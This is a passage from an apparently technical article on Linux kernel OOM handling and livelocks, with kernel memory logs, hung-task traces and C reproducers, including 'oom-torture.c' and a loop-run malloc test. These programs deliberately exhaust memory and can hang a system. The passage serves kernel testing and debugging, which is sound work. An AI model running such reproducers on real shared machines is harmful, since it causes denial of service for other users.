0*2048kB 0*4096kB = 22228kB [ 360.075472] Node 0 DMA32 free:17856kB min:5564kB low:6952kB high:8344kB active_anon:117872kB inactive_anon:25588kB active_file:1022532kB inactive_file:466856kB unevictable:0kB isolated(anon):0kB isolated(file):116kB present:2080640kB managed:2021100kB mlocked:0kB dirty:420kB writeback:0kB mapped:25300kB shmem:40976kB slab_reclaimable:57804kB slab_unreclaimable:79416kB kernel_stack:46784kB pagetables:78044kB unstable:0kB bounce:0kB free_pcp:1100kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? 
no [ 360.093794] Node 0 DMA32: 2719*4kB (UM) 97*8kB (UM) 14*16kB (UM) 37*32kB (UME) 27*64kB (UME) 3*128kB (UM) 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 15172kB [ 368.853099] Node 0 DMA32 free:22524kB min:5564kB low:6952kB high:8344kB active_anon:79156kB inactive_anon:24876kB active_file:872972kB inactive_file:738900kB unevictable:0kB isolated(anon):0kB isolated(file):96kB present:2080640kB managed:2021100kB mlocked:0kB dirty:0kB writeback:0kB mapped:25708kB shmem:40976kB slab_reclaimable:50820kB slab_unreclaimable:62880kB kernel_stack:32048kB pagetables:49656kB unstable:0kB bounce:0kB free_pcp:524kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? no [ 368.871173] Node 0 DMA32: 5042*4kB (UM) 248*8kB (UM) 0*16kB 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 22152kB [ 379.261759] Node 0 DMA32 free:15888kB min:5564kB low:6952kB high:8344kB active_anon:89928kB inactive_anon:23780kB active_file:1295512kB inactive_file:358284kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:2080640kB managed:2021100kB mlocked:0kB dirty:1608kB writeback:0kB mapped:25376kB shmem:40976kB slab_reclaimable:47972kB slab_unreclaimable:50848kB kernel_stack:22320kB pagetables:42360kB unstable:0kB bounce:0kB free_pcp:248kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? no [ 379.279344] Node 0 DMA32: 2994*4kB (ME) 503*8kB (UM) 0*16kB 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 16000kB [ 387.367409] Node 0 DMA32 free:15320kB min:5564kB low:6952kB high:8344kB active_anon:76364kB inactive_anon:28712kB active_file:1061180kB inactive_file:596956kB unevictable:0kB isolated(anon):0kB isolated(file):120kB present:2080640kB managed:2021100kB mlocked:0kB dirty:20kB writeback:0kB mapped:27700kB shmem:49168kB slab_reclaimable:51236kB slab_unreclaimable:51096kB kernel_stack:22912kB pagetables:40920kB unstable:0kB bounce:0kB free_pcp:700kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? no [ 387.385740] Node 0 DMA32: 3638*4kB (UM) 115*8kB (UM) 1*16kB (U) 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 15488kB [ 391.207543] Node 0 DMA32 free:15224kB min:5564kB low:6952kB high:8344kB active_anon:115956kB inactive_anon:28392kB active_file:1117532kB inactive_file:359656kB unevictable:0kB isolated(anon):0kB isolated(file):116kB present:2080640kB managed:2021100kB mlocked:0kB dirty:0kB writeback:0kB mapped:29348kB shmem:49168kB slab_reclaimable:56028kB slab_unreclaimable:85168kB kernel_stack:48592kB pagetables:81620kB unstable:0kB bounce:0kB free_pcp:1124kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:356 all_unreclaimable? no [ 391.228084] Node 0 DMA32: 3374*4kB (UME) 221*8kB (M) 0*16kB 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 15264kB [ 395.663881] Node 0 DMA32 free:12820kB min:5564kB low:6952kB high:8344kB active_anon:98924kB inactive_anon:27520kB active_file:1105780kB inactive_file:494760kB unevictable:0kB isolated(anon):4kB isolated(file):0kB present:2080640kB managed:2021100kB mlocked:0kB dirty:1412kB writeback:12kB mapped:29588kB shmem:49168kB slab_reclaimable:49836kB slab_unreclaimable:60524kB kernel_stack:32176kB pagetables:50356kB unstable:0kB bounce:0kB free_pcp:1500kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:388 all_unreclaimable? 
no [ 395.683137] Node 0 DMA32: 3794*4kB (ME) 0*8kB 0*16kB 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 15176kB [ 399.871655] Node 0 DMA32 free:18432kB min:5564kB low:6952kB high:8344kB active_anon:99156kB inactive_anon:26780kB active_file:1150532kB inactive_file:408872kB unevictable:0kB isolated(anon):68kB isolated(file):80kB present:2080640kB managed:2021100kB mlocked:0kB dirty:3492kB writeback:0kB mapped:30924kB shmem:49168kB slab_reclaimable:54236kB slab_unreclaimable:68184kB kernel_stack:37392kB pagetables:63708kB unstable:0kB bounce:0kB free_pcp:784kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? no [ 399.890082] Node 0 DMA32: 4155*4kB (UME) 200*8kB (ME) 0*16kB 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 18220kB [ 408.447006] Node 0 DMA32 free:12684kB min:5564kB low:6952kB high:8344kB active_anon:74296kB inactive_anon:25960kB active_file:1086404kB inactive_file:605660kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:2080640kB managed:2021100kB mlocked:0kB dirty:264kB writeback:0kB mapped:30604kB shmem:49168kB slab_reclaimable:50200kB slab_unreclaimable:45212kB kernel_stack:19184kB pagetables:34500kB unstable:0kB bounce:0kB free_pcp:740kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? no [ 408.465169] Node 0 DMA32: 2804*4kB (ME) 203*8kB (UME) 0*16kB 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 12840kB [ 416.426931] Node 0 DMA32 free:15396kB min:5564kB low:6952kB high:8344kB active_anon:98836kB inactive_anon:32120kB active_file:964808kB inactive_file:666224kB unevictable:0kB isolated(anon):0kB isolated(file):116kB present:2080640kB managed:2021100kB mlocked:0kB dirty:4kB writeback:0kB mapped:33628kB shmem:57332kB slab_reclaimable:51048kB slab_unreclaimable:51824kB kernel_stack:23328kB pagetables:41896kB unstable:0kB bounce:0kB free_pcp:988kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? no [ 416.447247] Node 0 DMA32: 5158*4kB (UME) 68*8kB (M) 0*16kB 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 21176kB [ 418.780159] Node 0 DMA32 free:8876kB min:5564kB low:6952kB high:8344kB active_anon:86544kB inactive_anon:31516kB active_file:965016kB inactive_file:654444kB unevictable:0kB isolated(anon):0kB isolated(file):116kB present:2080640kB managed:2021100kB mlocked:0kB dirty:4kB writeback:0kB mapped:8408kB shmem:57332kB slab_reclaimable:48856kB slab_unreclaimable:61116kB kernel_stack:30224kB pagetables:48636kB unstable:0kB bounce:0kB free_pcp:980kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:260 all_unreclaimable? no [ 418.799643] Node 0 DMA32: 3093*4kB (UME) 1043*8kB (UME) 2*16kB (M) 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 20748kB [ 428.087913] Node 0 DMA32 free:22760kB min:5564kB low:6952kB high:8344kB active_anon:94544kB inactive_anon:38936kB active_file:1013576kB inactive_file:564976kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:2080640kB managed:2021100kB mlocked:0kB dirty:0kB writeback:0kB mapped:36096kB shmem:65376kB slab_reclaimable:52196kB slab_unreclaimable:60576kB kernel_stack:29888kB pagetables:56364kB unstable:0kB bounce:0kB free_pcp:852kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? 
no [ 428.109005] Node 0 DMA32: 2943*4kB (UME) 458*8kB (UME) 20*16kB (UME) 11*32kB (UME) 11*64kB (ME) 4*128kB (UME) 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 17324kB [ 439.014180] Node 0 DMA32 free:11232kB min:5564kB low:6952kB high:8344kB active_anon:82868kB inactive_anon:38872kB active_file:1189912kB inactive_file:439592kB unevictable:0kB isolated(anon):12kB isolated(file):40kB present:2080640kB managed:2021100kB mlocked:0kB dirty:0kB writeback:1152kB mapped:35948kB shmem:65376kB slab_reclaimable:51224kB slab_unreclaimable:56664kB kernel_stack:27696kB pagetables:43180kB unstable:0kB bounce:0kB free_pcp:380kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? no [ 439.032446] Node 0 DMA32: 2761*4kB (UM) 28*8kB (UM) 0*16kB 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 11268kB [ 441.731001] Node 0 DMA32 free:15056kB min:5564kB low:6952kB high:8344kB active_anon:90532kB inactive_anon:42716kB active_file:1204248kB inactive_file:377196kB unevictable:0kB isolated(anon):12kB isolated(file):116kB present:2080640kB managed:2021100kB mlocked:0kB dirty:4kB writeback:0kB mapped:5552kB shmem:73568kB slab_reclaimable:52956kB slab_unreclaimable:68304kB kernel_stack:39936kB pagetables:47472kB unstable:0kB bounce:0kB free_pcp:624kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? no [ 441.731018] Node 0 DMA32: 3130*4kB (UM) 338*8kB (UM) 0*16kB 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 15224kB [ 442.070851] Node 0 DMA32 free:8852kB min:5564kB low:6952kB high:8344kB active_anon:90412kB inactive_anon:42664kB active_file:1179304kB inactive_file:371316kB unevictable:0kB isolated(anon):108kB isolated(file):268kB present:2080640kB managed:2021100kB mlocked:0kB dirty:4kB writeback:0kB mapped:5544kB shmem:73568kB slab_reclaimable:55136kB slab_unreclaimable:80080kB kernel_stack:55456kB pagetables:52692kB unstable:0kB bounce:0kB free_pcp:312kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:348 all_unreclaimable? no [ 442.070867] Node 0 DMA32: 590*4kB (ME) 827*8kB (ME) 0*16kB 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 8976kB [ 442.245192] Node 0 DMA32 free:10832kB min:5564kB low:6952kB high:8344kB active_anon:97756kB inactive_anon:42664kB active_file:1082048kB inactive_file:417012kB unevictable:0kB isolated(anon):108kB isolated(file):268kB present:2080640kB managed:2021100kB mlocked:0kB dirty:4kB writeback:0kB mapped:5248kB shmem:73568kB slab_reclaimable:62816kB slab_unreclaimable:88964kB kernel_stack:61408kB pagetables:62908kB unstable:0kB bounce:0kB free_pcp:696kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? no [ 442.245208] Node 0 DMA32: 1902*4kB (UME) 410*8kB (UME) 0*16kB 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 10888kB ---------- Example output end ----------
Because this problem was discovered, we concluded that more testing was needed, and the modification was not sent to the initially targeted Linux 4.6. After a lot of further testing, we concluded that it produced reasonable results, and the modification was sent to Linux 4.7.
We are currently at the stage of watching whether it works well without side effects. But since almost nobody actively tests behavior under memory pressure, I cannot deny the possibility that unexpected side effects will be found after this change is included in enterprise Linux distributions.
Incidentally, a few hours before the modification was merged into linux.git, Oleg Nesterov reported a problem where the system enters an OOM livelock situation due to the retry logic based on zone_reclaimable(). That problem should already be solved by the modification, but I was surprised to see the reproducer Oleg posted.
Mercy! Oleg reported that the problem can be reproduced by repeatedly running the trivial reproducer shown below on a system with one CPU. What a contrast to my multi-threaded reproducers, which I developed through trial and error in order to intentionally bring the system right up to the edge of OOM.
---------- oleg's-test.c ----------
#include <stdlib.h>
#include <string.h>

int main(void)
{
        for (;;) {
                void *p = malloc(1024 * 1024);
                memset(p, 0, 1024 * 1024);
        }
}
---------- oleg's-test.c ----------
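If you want to try it yourself (this is my wording; Oleg's original posting on the mailing list is the reference), it is enough to compile it as usual and restart it in a loop, since each run is terminated by the OOM killer or by a segmentation fault once malloc() returns NULL: for example, `gcc -O2 -o oleg-test "oleg's-test.c"` and then `while :; do ./oleg-test; done` on a single-CPU virtual machine.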
…we simply cannot predict in which situations a problem caused by memory management will pop up.
The OOM detection rework, like the OOM reaper, went through a long discussion, much of which is too difficult for me to follow. Still, let me introduce one unresolved problem which was discovered while testing the OOM detection rework.
Linux 2.6.32 and later include commit 35cd78156c499ef8 ("vmscan: throttle direct reclaim when too many pages are isolated already") in order to avoid premature invocation of the OOM killer. But that patch did not anticipate a situation where the kswapd kernel thread, which reclaims memory asynchronously, is itself blocked on locks that are acquired while reclaiming memory. The result is an infinite loop in which every thread making a memory allocation request waits for kswapd forever, and the system enters an OOM livelock situation without invoking the OOM killer. The toy program below sketches this circular wait in userspace; the actual reproducer, oom-torture.c, follows it.
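This is a runnable userspace toy of my own devising (plain pthreads, not kernel code) that mimics the circular wait just described: "allocators" spin waiting for "kswapd" to make progress, "kswapd" blocks on a lock held by a "filesystem" thread, and the "filesystem" thread is itself waiting for the allocators to finish. All names, including fs_lock, are purely illustrative.
---------- livelock-analogy.c ----------
/* Build: gcc -O2 -pthread -o livelock-analogy livelock-analogy.c */
#include <pthread.h>
#include <stdio.h>
#include <unistd.h>

/* Volatile busy-wait flags are good enough for this demonstration. */
static pthread_mutex_t fs_lock = PTHREAD_MUTEX_INITIALIZER;
static volatile int progress = 0;
static volatile int allocations_done = 0;

/* too_many_isolated() analogue: loop until "kswapd" makes progress. */
static void *allocator(void *unused)
{
        while (!progress)
                usleep(100000); /* congestion_wait() analogue */
        allocations_done = 1;
        return NULL;
}

/* Holds a "filesystem" lock while waiting for memory to become available. */
static void *filesystem_writer(void *unused)
{
        pthread_mutex_lock(&fs_lock);
        while (!allocations_done)
                usleep(100000);
        pthread_mutex_unlock(&fs_lock);
        return NULL;
}

/* Blocks behind filesystem_writer, so progress is never set. */
static void *kswapd(void *unused)
{
        pthread_mutex_lock(&fs_lock);
        progress = 1; /* Never reached. */
        pthread_mutex_unlock(&fs_lock);
        return NULL;
}

int main(void)
{
        pthread_t t[3];
        pthread_create(&t[0], NULL, filesystem_writer, NULL);
        sleep(1); /* Make sure fs_lock is held before starting "kswapd". */
        pthread_create(&t[1], NULL, kswapd, NULL);
        pthread_create(&t[2], NULL, allocator, NULL);
        fprintf(stderr, "Circular wait established; no thread will finish.\n");
        pthread_join(t[2], NULL); /* Never returns. */
        return 0;
}
---------- livelock-analogy.c ----------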
---------- oom-torture.c ----------
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <signal.h>
#include <poll.h>

static char use_delay = 0;

static void sigcld_handler(int unused)
{
        use_delay = 1;
}

int main(int argc, char *argv[])
{
        static char buffer[4096] = { };
        char *buf = NULL;
        unsigned long size;
        int i;
        signal(SIGCLD, sigcld_handler);
        for (i = 0; i < 1024; i++) {
                if (fork() == 0) {
                        int fd = open("/proc/self/oom_score_adj", O_WRONLY);
                        write(fd, "1000", 4);
                        close(fd);
                        sleep(1);
                        if (!i)
                                pause();
                        snprintf(buffer, sizeof(buffer), "/tmp/file.%u",
                                 getpid());
                        fd = open(buffer, O_WRONLY | O_CREAT | O_APPEND, 0600);
                        while (write(fd, buffer, sizeof(buffer)) ==
                               sizeof(buffer)) {
                                poll(NULL, 0, 10);
                                fsync(fd);
                        }
                        _exit(0);
                }
        }
        for (size = 1048576; size < 512UL * (1 << 30); size <<= 1) {
                char *cp = realloc(buf, size);
                if (!cp) {
                        size >>= 1;
                        break;
                }
                buf = cp;
        }
        sleep(2);
        /* Will cause OOM due to overcommit */
        for (i = 0; i < size; i += 4096) {
                buf[i] = 0;
                if (use_delay) /* Give children a chance to write(). */
                        poll(NULL, 0, 10);
        }
        pause();
        return 0;
}
---------- oom-torture.c ----------
---------- Example output start ---------- [ 1096.700789] systemd invoked oom-killer: gfp_mask=0x24201ca(GFP_HIGHUSER_MOVABLE|__GFP_COLD), order=0, oom_score_adj=0 [ 1096.708751] systemd cpuset=/ mems_allowed=0 [ 1096.712519] CPU: 2 PID: 1 Comm: systemd Not tainted 4.7.0-rc7+ #55 [ 1096.717463] Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 07/31/2013 [ 1096.725553] 0000000000000286 0000000006e33503 ffff88003faef998 ffffffff812d727d [ 1096.731302] 0000000000000000 ffff88003faefbb0 ffff88003faefa38 ffffffff811c5944 [ 1096.736956] 0000000000000206 ffffffff8182b870 ffff88003faef9d8 ffffffff810c0ef9 [ 1096.742600] Call Trace: [ 1096.744916] [<ffffffff812d727d>] dump_stack+0x85/0xc8 [ 1096.749276] [<ffffffff811c5944>] dump_header+0x5b/0x3a8 [ 1096.753708] [<ffffffff810c0ef9>] ? trace_hardirqs_on_caller+0xf9/0x1c0 [ 1096.758659] [<ffffffff810c0fcd>] ? trace_hardirqs_on+0xd/0x10 [ 1096.763176] [<ffffffff81626e45>] ? _raw_spin_unlock_irqrestore+0x45/0x80 [ 1096.768275] [<ffffffff8114eda8>] oom_kill_process+0x388/0x520 [ 1096.772759] [<ffffffff8114f51f>] out_of_memory+0x58f/0x5e0 [ 1096.777101] [<ffffffff8114f180>] ? out_of_memory+0x1f0/0x5e0 [ 1096.781511] [<ffffffff8115447f>] __alloc_pages_nodemask+0xeff/0xf70 [ 1096.786612] [<ffffffff8119e8c6>] alloc_pages_current+0x96/0x1b0 [ 1096.791221] [<ffffffff8114933d>] __page_cache_alloc+0x12d/0x160 [ 1096.796023] [<ffffffff8114cf5f>] filemap_fault+0x45f/0x670 [ 1096.800329] [<ffffffff8114ce30>] ? filemap_fault+0x330/0x670 [ 1096.804672] [<ffffffffa0245be9>] xfs_filemap_fault+0x39/0x60 [xfs] [ 1096.809332] [<ffffffff81176e71>] __do_fault+0x71/0x140 [ 1096.813331] [<ffffffff8117d53c>] handle_mm_fault+0x12ec/0x1f30 [ 1096.817750] [<ffffffff8105c7b2>] ? __do_page_fault+0x102/0x560 [ 1096.822166] [<ffffffff8105c840>] __do_page_fault+0x190/0x560 [ 1096.826542] [<ffffffff8105cc40>] do_page_fault+0x30/0x80 [ 1096.830551] [<ffffffff81629278>] page_fault+0x28/0x30 [ 1096.835739] Mem-Info: [ 1096.838525] active_anon:197561 inactive_anon:2919 isolated_anon:0 [ 1096.838525] active_file:284 inactive_file:479 isolated_file:32 [ 1096.838525] unevictable:0 dirty:0 writeback:126 unstable:0 [ 1096.838525] slab_reclaimable:1717 slab_unreclaimable:11222 [ 1096.838525] mapped:360 shmem:3239 pagetables:5654 bounce:0 [ 1096.838525] free:12151 free_pcp:319 free_cma:0 [ 1096.867008] Node 0 DMA free:4472kB min:732kB low:912kB high:1092kB active_anon:8600kB inactive_anon:0kB active_file:44kB inactive_file:44kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:15988kB managed:15904kB mlocked:0kB dirty:0kB writeback:8kB mapped:44kB shmem:8kB slab_reclaimable:148kB slab_unreclaimable:796kB kernel_stack:432kB pagetables:524kB unstable:0kB bounce:0kB free_pcp:0kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:568 all_unreclaimable? yes [ 1096.904546] lowmem_reserve[]: 0 936 936 936 [ 1096.909808] Node 0 DMA32 free:45364kB min:44320kB low:55400kB high:66480kB active_anon:781560kB inactive_anon:11676kB active_file:1152kB inactive_file:1196kB unevictable:0kB isolated(anon):0kB isolated(file):256kB present:1032064kB managed:981068kB mlocked:0kB dirty:0kB writeback:496kB mapped:1396kB shmem:12948kB slab_reclaimable:6716kB slab_unreclaimable:43992kB kernel_stack:20384kB pagetables:22092kB unstable:0kB bounce:0kB free_pcp:716kB local_pcp:124kB free_cma:0kB writeback_tmp:0kB pages_scanned:3852 all_unreclaimable? 
no [ 1096.945857] lowmem_reserve[]: 0 0 0 0 [ 1096.950262] Node 0 DMA: 38*4kB (UM) 26*8kB (UM) 11*16kB (UM) 11*32kB (UM) 2*64kB (UM) 3*128kB (UM) 4*256kB (UM) 2*512kB (UM) 1*1024kB (U) 0*2048kB 0*4096kB = 4472kB [ 1096.963656] Node 0 DMA32: 1333*4kB (UME) 1032*8kB (UME) 670*16kB (UME) 308*32kB (UME) 111*64kB (UE) 24*128kB (UME) 4*256kB (UM) 0*512kB 0*1024kB 0*2048kB 0*4096kB = 45364kB [ 1096.976258] Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0 hugepages_size=1048576kB [ 1096.983860] Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0 hugepages_size=2048kB [ 1096.994897] 3918 total pagecache pages [ 1096.999165] 0 pages in swap cache [ 1097.002688] Swap cache stats: add 0, delete 0, find 0/0 [ 1097.007309] Free swap = 0kB [ 1097.010194] Total swap = 0kB [ 1097.012787] 262013 pages RAM [ 1097.015345] 0 pages HighMem/MovableOnly [ 1097.020898] 12770 pages reserved [ 1097.024751] 0 pages cma reserved [ 1097.027858] 0 pages hwpoisoned [ 1097.031473] Out of memory: Kill process 4206 (oom-torture) score 999 or sacrifice child [ 1097.037825] Killed process 4206 (oom-torture) total-vm:4176kB, anon-rss:84kB, file-rss:0kB, shmem-rss:0kB [ 1097.045884] oom_reaper: reaped process 4206 (oom-torture), now anon-rss:0kB, file-rss:0kB, shmem-rss:0kB [ 1200.867049] INFO: task oom-torture:3970 blocked for more than 120 seconds. [ 1200.890695] Not tainted 4.7.0-rc7+ #55 [ 1200.898627] "echo 0 > /proc/sys/kernel/hung_task_timeout_secs" disables this message. [ 1200.913371] oom-torture D ffff88003bcff428 0 3970 3652 0x00000080 [ 1200.926432] ffff88003bcff428 ffff88002a996100 ffff88003fba4080 ffff88002a996100 [ 1200.939946] ffff88003bd00000 ffff880037de7070 ffff88002a996100 ffff880035d00000 [ 1200.950865] 0000000000000000 ffff88003bcff440 ffffffff81621dea 7fffffffffffffff [ 1200.957640] Call Trace: [ 1200.961125] [<ffffffff81621dea>] schedule+0x3a/0x90 [ 1200.965512] [<ffffffff816266df>] schedule_timeout+0x17f/0x1c0 [ 1200.970311] [<ffffffff810c0dd6>] ? mark_held_locks+0x66/0x90 [ 1200.975693] [<ffffffff81626ea7>] ? _raw_spin_unlock_irq+0x27/0x60 [ 1200.980603] [<ffffffff810c0ef9>] ? trace_hardirqs_on_caller+0xf9/0x1c0 [ 1200.985516] [<ffffffff816253fb>] __down+0x71/0xb8 [ 1200.989693] [<ffffffff81626c86>] ? _raw_spin_lock_irqsave+0x56/0x70 [ 1200.994497] [<ffffffff810bcf1c>] down+0x3c/0x50 [ 1200.998181] [<ffffffffa02425e1>] xfs_buf_lock+0x21/0x50 [xfs] [ 1201.002629] [<ffffffffa02427c5>] _xfs_buf_find+0x1b5/0x2e0 [xfs] [ 1201.007199] [<ffffffffa0242915>] xfs_buf_get_map+0x25/0x160 [xfs] [ 1201.011795] [<ffffffffa0242ee9>] xfs_buf_read_map+0x29/0xe0 [xfs] [ 1201.016359] [<ffffffffa026d837>] xfs_trans_read_buf_map+0x97/0x1a0 [xfs] [ 1201.021284] [<ffffffffa020ad95>] xfs_read_agf+0x75/0xb0 [xfs] [ 1201.025590] [<ffffffffa020adf6>] xfs_alloc_read_agf+0x26/0xd0 [xfs] [ 1201.030407] [<ffffffffa020b1c5>] xfs_alloc_fix_freelist+0x325/0x3e0 [xfs] [ 1201.035343] [<ffffffffa0239752>] ? xfs_perag_get+0x82/0x110 [xfs] [ 1201.039829] [<ffffffff812dd76e>] ? 
__radix_tree_lookup+0x6e/0xd0 [ 1201.044235] [<ffffffffa020b47e>] xfs_alloc_vextent+0x19e/0x480 [xfs] [ 1201.048841] [<ffffffffa02190cf>] xfs_bmap_btalloc+0x3bf/0x710 [xfs] [ 1201.053380] [<ffffffffa0219429>] xfs_bmap_alloc+0x9/0x10 [xfs] [ 1201.057632] [<ffffffffa0219e1a>] xfs_bmapi_write+0x47a/0xa10 [xfs] [ 1201.062077] [<ffffffffa024f3fd>] xfs_iomap_write_allocate+0x16d/0x350 [xfs] [ 1201.066970] [<ffffffffa023c4ed>] xfs_map_blocks+0x13d/0x150 [xfs] [ 1201.071307] [<ffffffffa023d468>] xfs_do_writepage+0x158/0x540 [xfs] [ 1201.075729] [<ffffffff81158326>] write_cache_pages+0x1f6/0x490 [ 1201.080437] [<ffffffffa023d310>] ? xfs_aops_discard_page+0x140/0x140 [xfs] [ 1201.085510] [<ffffffff810c1a9b>] ? __lock_acquire+0x75b/0x1a30 [ 1201.090299] [<ffffffffa023d136>] xfs_vm_writepages+0x66/0xa0 [xfs] [ 1201.094736] [<ffffffff811594ac>] do_writepages+0x1c/0x30 [ 1201.098589] [<ffffffff8114bab1>] __filemap_fdatawrite_range+0xc1/0x100 [ 1201.103563] [<ffffffff8114bbc8>] filemap_write_and_wait_range+0x28/0x60 [ 1201.108244] [<ffffffffa02458f4>] xfs_file_fsync+0x44/0x180 [xfs] [ 1201.112542] [<ffffffff811ff2b8>] vfs_fsync_range+0x38/0xa0 [ 1201.116499] [<ffffffff811eb68a>] ? __fget_light+0x6a/0x90 [ 1201.120399] [<ffffffff811ff378>] do_fsync+0x38/0x60 [ 1201.123990] [<ffffffff811ff5fb>] SyS_fsync+0xb/0x10 [ 1201.127842] [<ffffffff81003642>] do_syscall_64+0x62/0x190 [ 1201.131751] [<ffffffff816277ff>] entry_SYSCALL64_slow_path+0x25/0x25 [ 1201.136237] 2 locks held by oom-torture/3970: [ 1201.141000] #0: (sb_internal){.+.+.?}, at: [<ffffffff811ce35c>] __sb_start_write+0xcc/0xe0 [ 1201.147852] #1: (&xfs_nondir_ilock_class){++++--}, at: [<ffffffffa0251caf>] xfs_ilock+0x7f/0xe0 [xfs] [ 1201.155109] INFO: task oom-torture:4083 blocked for more than 120 seconds. [ 1201.160866] Not tainted 4.7.0-rc7+ #55 [ 1201.164425] "echo 0 > /proc/sys/kernel/hung_task_timeout_secs" disables this message. [ 1201.170062] oom-torture D ffff88003aa47428 0 4083 3652 0x00000080 [ 1201.176947] ffff88003aa47428 ffff88003aa400c0 ffff88002bd3c100 ffff88003aa400c0 [ 1201.182405] ffff88003aa48000 ffff880037de7070 ffff88003aa400c0 ffff880035d00000 [ 1201.188232] 0000000000000000 ffff88003aa47440 ffffffff81621dea 7fffffffffffffff [ 1201.194181] Call Trace: [ 1201.196438] [<ffffffff81621dea>] schedule+0x3a/0x90 [ 1201.200074] [<ffffffff816266df>] schedule_timeout+0x17f/0x1c0 [ 1201.204263] [<ffffffff810c0dd6>] ? mark_held_locks+0x66/0x90 [ 1201.208399] [<ffffffff81626ea7>] ? _raw_spin_unlock_irq+0x27/0x60 [ 1201.213164] [<ffffffff810c0ef9>] ? trace_hardirqs_on_caller+0xf9/0x1c0 [ 1201.217851] [<ffffffff816253fb>] __down+0x71/0xb8 [ 1201.221396] [<ffffffff81626c86>] ? _raw_spin_lock_irqsave+0x56/0x70 [ 1201.225927] [<ffffffff810bcf1c>] down+0x3c/0x50 [ 1201.229349] [<ffffffffa02425e1>] xfs_buf_lock+0x21/0x50 [xfs] [ 1201.233532] [<ffffffffa02427c5>] _xfs_buf_find+0x1b5/0x2e0 [xfs] [ 1201.237877] [<ffffffffa0242915>] xfs_buf_get_map+0x25/0x160 [xfs] [ 1201.242283] [<ffffffffa0242ee9>] xfs_buf_read_map+0x29/0xe0 [xfs] [ 1201.247024] [<ffffffff810afc21>] ? enqueue_entity+0x1e1/0xba0 [ 1201.251190] [<ffffffffa026d837>] xfs_trans_read_buf_map+0x97/0x1a0 [xfs] [ 1201.255961] [<ffffffffa020ad95>] xfs_read_agf+0x75/0xb0 [xfs] [ 1201.260139] [<ffffffffa020adf6>] xfs_alloc_read_agf+0x26/0xd0 [xfs] [ 1201.264992] [<ffffffffa020b1c5>] xfs_alloc_fix_freelist+0x325/0x3e0 [xfs] [ 1201.269857] [<ffffffffa0239752>] ? xfs_perag_get+0x82/0x110 [xfs] [ 1201.274528] [<ffffffff812dd76e>] ? 
__radix_tree_lookup+0x6e/0xd0 [ 1201.279040] [<ffffffffa020b47e>] xfs_alloc_vextent+0x19e/0x480 [xfs] [ 1201.284013] [<ffffffffa02190cf>] xfs_bmap_btalloc+0x3bf/0x710 [xfs] [ 1201.288578] [<ffffffffa0219429>] xfs_bmap_alloc+0x9/0x10 [xfs] [ 1201.292852] [<ffffffffa0219e1a>] xfs_bmapi_write+0x47a/0xa10 [xfs] [ 1201.297644] [<ffffffffa024f3fd>] xfs_iomap_write_allocate+0x16d/0x350 [xfs] [ 1201.302610] [<ffffffffa023c4ed>] xfs_map_blocks+0x13d/0x150 [xfs] [ 1201.307028] [<ffffffffa023d468>] xfs_do_writepage+0x158/0x540 [xfs] [ 1201.311537] [<ffffffff81158326>] write_cache_pages+0x1f6/0x490 [ 1201.315770] [<ffffffffa023d310>] ? xfs_aops_discard_page+0x140/0x140 [xfs] [ 1201.322135] [<ffffffff810c1a9b>] ? __lock_acquire+0x75b/0x1a30 [ 1201.326382] [<ffffffffa023d136>] xfs_vm_writepages+0x66/0xa0 [xfs] [ 1201.330841] [<ffffffff811594ac>] do_writepages+0x1c/0x30 [ 1201.335292] [<ffffffff8114bab1>] 